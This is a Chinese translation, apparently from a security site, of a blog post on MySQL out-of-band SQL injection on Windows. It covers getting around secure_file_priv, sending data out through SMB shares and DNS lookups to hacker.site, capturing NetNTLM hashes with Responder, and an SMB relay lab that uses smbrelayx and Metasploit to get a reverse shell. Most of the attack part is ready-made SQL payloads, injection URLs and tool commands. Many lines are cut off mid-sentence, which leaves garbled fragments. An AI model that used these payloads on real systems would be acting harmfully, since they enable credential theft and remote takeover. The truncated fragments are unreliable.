Brexit
预估稿费:180RMB
投稿方式:发送邮件至 linwei#360.cn ,或登陆网页版在线投稿
概述
关于MSSQL和所有的这一切都只在Windows环境下的MySQL中有可能实现。
什么是带外注入?
这些攻击涉及通过除服务器以外的其它方式提取
MySQL的限制条件
MySQL中存在一个全局系统变量secure_file_priv。这个变量用来限制数据导入和导出操作的影响,例如由LOAD DATA 和SELECT…INTO OUTFILE语句和LOAD_FILE()函数执行的行为。
如果将这个变量设置为一个
如果这个变量为空,那么它不会产生影响,这样
如果将这个变量设置为NULL,那么服务器就会禁用导入和导出操作。这个值从MySQL 5.5.53版本开始就是合法的。
在MySQL 5.5.53版本之前,这个变量默认为空,因此我们就可以使用这些函数。但是在该版本之后,NULL值会禁用这些函数。我们可使用其中的一种方法来检查这个变量的值。Secure_file_priv是一个全局变量且是一个只读变量,也就是说在运行时无法更改。
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";
例如在我的MySQL 5.5.34版本中,默认值为空,也就是说我们能够使用这些函数。
在MySQL 5.6.34版本中,这个值默认是NULL,它会禁用导入和导出操作。
权变措施
以下是我认为可以解决5.5.53之后版本中这个问题的一些权变措施。
启动
my
在”my.ini”配置文件中增加一个条目。
secure-file-priv=
要查找默认选项的加载顺序和配置文件的路径,输入以下内容:
mysqld.exe --help --verbose
将配置文件指向mysqld.exe。
你可以创建一个新的文件myfile.ini并将这个文件作为MySQL的默认配置。
mysqld.exe --defaults-file=myfile.ini
你的配置内容是:
[mysqld]
secure-file-priv=
使用文件系统提取数据
在MySQL中,我们可以使用一个共享文件系统当做提取数据的替代渠道。
select @@version into outfile '192.168.0.100//temp//out.txt';
select @@version into dumpfile '192.168.0.100//temp//out.txt';
select @@version into outfile '//192.168.0.100/temp/out.txt';
select @@version into dumpfile '//192.168.0.100/temp/out.txt';
注意,如果引用被过滤,那么你就无法使用十六进制会话或者其他格式作为文件路径。
使用DNS解析提取数据
另外一种方法就是使用DNS解析。
select load_file(con
你可以清楚地看到5.6.34版本跟DNS查询是一起被发送的。
当MySQL尝试解析DNS查询时,我们能够记录DNS请求并成功地从hacker.site的DNS服务器中成功提取数据。数据被记录为一个子域。
提取数据时,要注意你处理的是DNS请求,不能使用特殊字符。要使用MySQL字符串函数如m
窃取NetNTLM哈希
如你所见,’load_file’和’into outfile/dumpfile’跟Windows下的UNC路径运行良好。它可被用于解析一个不存在的路径,而且当DNS失败时,这个请求可被发送为LLMNR、NetB
我们在攻击中可用到的工具包括:
Responder
Ilmnr_response
MiTMf
在这个例子中,我会使用Responder。我在
responder -I eth0 -rv
然后,我们可以使用load_file、into outfile/dumpfile或load data infile来解析一个无效的UNC路径。
select load_file('error//abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile 'error//abc';
select 'osanda' into outfile 'error//abc';
load data infile 'error//abc' into
SMB中继攻击
通过使用函数如load_file、into outfile/dumpfile和load data infile,我们能够访问Windows环境下的UNC路径。我们能够在SMB中继攻击中利用这个功能,并且在目标设备中弹出一个
这是为此次试验做的实验室设置配置。
MySQL服务器:Windows 8: 192.168.0.100
攻击者:Kali: 192.168.0.101
受害者:Windows 7: 192.168.0.103(以
使用的工具是:
Smbrelayx
Metasploit
首先,我在Kali盒子中生成了一个反向shell,并在Metasploit上运行multi/handler模块。
msfvenom -p
接着,运行smbrelayx工具以明确受害者的IP地址和生成的反向shell并等待流入的连接。
smbrelayx.py -h 192.168.0.103 -e ./reverse_shell.exe
一旦我们从MySQL服务器中执行任意语句,我们会从受害者盒子中得到反向shell。
select load_file('192.168.0.101//aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'osanda' into dumpfile '192.168.0.101//aa';
select 'osanda' into outfile '192.168.0.101//aa';
load data infile '192.168.0.101//aa' into table database.table_name;
这些是来自multi/handler模块Metasploit中的选项:
一旦MySQL服务器把一个请求发送到Kali盒子,smbrelayx就会执行SMB中继攻击并且将我们的反向shell上传并执行。
如果攻击成功,那么我们就会从Windows 7盒子中得到我们的反向shell。
基于union和error的注入
Load_file函数能够用于基于union和error的注入。例如,在基于union的场景中,我们可以使用OOB注入,如:
我们可以只使用基于error的技术如BIGINT溢出方法或者EXP 基于error的方法。
http://192.168.0.100/?id=-1' or !(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))x)-~0-- -
http://192.168.0.100/?id=-1' or exp(~(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))a))-- -
你可以不使用or,而使用||、 |、and、 &&、 &、 >>、 <、 >=、 *、 mul、 /、 div、 -、 +、 % 和 mod。
XSS + SQLi
你可以把
需要注意的是,当处理
你也可以使用MySQL来回显
http://192.168.0.100/?id=-1' union select 1,'
结论
当由于向量被禁用、受限或者被过滤且唯一的选择就是使用推理方法,从而导致所有带内方法不起作用时,我们可以使用以上提到的方法。
致谢
特别感谢@m3g9tr0n为研究提供的支持。
论文
参考
https://dev.mysql.com/doc/refman/5.5/en/
https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-
https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/